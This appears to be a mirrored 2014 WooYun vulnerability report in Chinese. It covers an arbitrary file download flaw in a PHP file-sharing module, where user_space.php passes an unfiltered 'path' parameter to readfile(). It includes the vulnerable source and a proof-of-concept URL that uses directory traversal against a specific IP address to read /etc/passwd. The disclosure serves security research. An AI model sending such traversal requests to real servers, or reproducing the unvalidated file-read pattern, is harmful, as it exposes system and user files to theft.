乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-27: 细节已通知厂商并且等待厂商处理中 2014-05-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-06-26: 细节向核心白帽子及相关领域专家公开 2014-07-06: 细节向普通白帽子公开 2014-07-16: 细节向实习白帽子公开 2014-07-23: 细节向公众公开
RT
if($res=$shared->gets("","file_type DESC")) { foreach($res as $k => $v) { $shid=$v["shid"]; $path=$v["path"]; if(!is_file($path)) { $shared->path=$path; $shared->del(); continue; } $path1=substr(strrchr($path,"/"),1); $file_time=date("Y-m-d H:i:s",filemtime($path)); $member_id=$v["member_id"]; $member_name=$v["member_name"]; $type=$res[0]["file_type"]; $url="user_space.php?username=".$username."&act=shared_show&path=".urlencode($path); switch($ftype) { case 2: $url1="<a href='user_space.php?username=".$username."&act=big_pic_show&path=".urlencode($path)."' target='_blank'>"; break; case 3: $url1="<a href='#' onclick='return false'>"; break; case 4: $url1="<a href='#' onclick='return false'>"; break; default: $url1="<a href='user_space.php?username=".$username."&act=shared_show&path=".urlencode($path)."'>"; } if(is_dir($path)) { $icon="pics/dir_big.gif"; } else { switch(strtolower(strrchr($path1,"."))) { case ".jpg": $icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path); break; case ".jpeg": $icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path); break; case ".gif": $icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path); break; case ".png": $icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path); break; case ".mp3": $icon="pics/mp3_big.gif"; break; case ".wma": $icon="pics/mp3_big.gif"; break; case ".wmv": $icon="pics/mp3_big.gif"; break; case ".mpg": $icon="pics/mp3_big.gif"; break; case ".avi": $icon="pics/mp3_big.gif"; break; case ".flv": $icon="pics/mp3_big.gif"; break; case ".3gp": $icon="pics/mp3_big.gif"; break; case ".swf": $icon="pics/mp3_big.gif"; break; default: $icon="pics/file_big.gif"; break; } } $eidolon->loopBlock("td"); $i++; if($i>4) { $i=0; $eidolon->loopBlock("tr","td"); $eidolon->cleanBlock("td"); } } $eidolon->loopBlock("tr","td"); } $shared->cutPage($eidolon); $eidolon->parseBlock("_main","tr"); $eidolon->showBlock("_main");}else if($_GET["act"]=="pic_show"){ $file_path=$_GET["path"]; if(!file_exists($file_path)) { exit("file not found"); } $w=($_GET["w"])?$_GET["w"]:120; $h=($_GET["h"])?$_GET["h"]:120; if($imgsize=getimagesize($file_path)) { $width=$w; $height=$w/$imgsize[0]*$imgsize[1]; } else { exit; } if($height>$h) { $height=$h; $width=$h/$imgsize[1]*$imgsize[0]; } $file_type=strtolower(strchr($file_path,".")); //switch(exif_imagetype($file_path)) switch($file_type) { //case IMAGETYPE_JPEG: case ".jpg": $im = imagecreatefromjpeg($file_path); break; case ".jpeg": $im = imagecreatefromjpeg($file_path); break; //case IMAGETYPE_PNG: case ".png": $im = imagecreatefrompng($file_path); break; //case IMAGETYPE_GIF: case ".gif": $im = imagecreatefromgif($file_path); break; default: exit; } $srcW = ImageSX($im); $srcH = ImageSY($im); $ni=imagecreatetruecolor($width,$height); imagecopyresampled($ni,$im,0,0,0,0,$width,$height,$srcW,$srcH); header("Content-Type:image/jpeg"); ImageJpeg($ni); }else if($_GET["act"]=="shared_show"){ $file_path=$_GET["path"]; if(!is_file($file_path)) { exit("error"); } $file_name=substr(strrchr($file_path,"/"),1); $type = substr(strrchr($file_path,"."),1); switch(strtolower($type)) { case "jpg": $mime="image/jpeg"; break; case "jpeg": $mime="image/jpeg"; break; case "png": $mime="image/png"; break; case "gif": $mime="image/gif"; break; default: $mime="application/".$type; } header("Content-Type:".$mime); header("Content-Disposition: attachment; filename=".urlencode($file_name)); readfile($file_path); }else if($_GET["act"]=="big_pic_show"){ $file_path=$_GET["path"]; if(!is_file($file_path)) { exit("error"); } $file_name=substr(strrchr($file_path,"/"),1); $type = substr(strrchr($file_path,"."),1); switch(strtolower($type)) { case "jpg": $mime="image/jpeg"; break; case "jpeg": $mime="image/jpeg"; break; case "png": $mime="image/png"; break; case "gif": $mime="image/gif"; break; default: $mime="application/".$type; } header("Content-Type:".$mime); //header("Content-Disposition: attachment; filename=".urlencode($file_name)); readfile($file_path); }else if($_GET["act"]=="passwd_input"){ echo "<form action='user_space.php?username=".$username."' method='post'>请输入密码:<input type='password' name='pass' size='16'><input type='submit' value='提交'></form>";}
$username $path$username没有过滤,$path参数只进行了URL编码urlencode($path),导致任意文件下载。
漏洞证明:
http://218.75.75.92/user_space.php?username=zaizai&act=shared_show&path=../../../../../../../../../etc/passwd
看了下代码几乎没有过滤,太含糊把。
危害等级:无影响厂商忽略
忽略时间:2014-07-23 18:34
暂无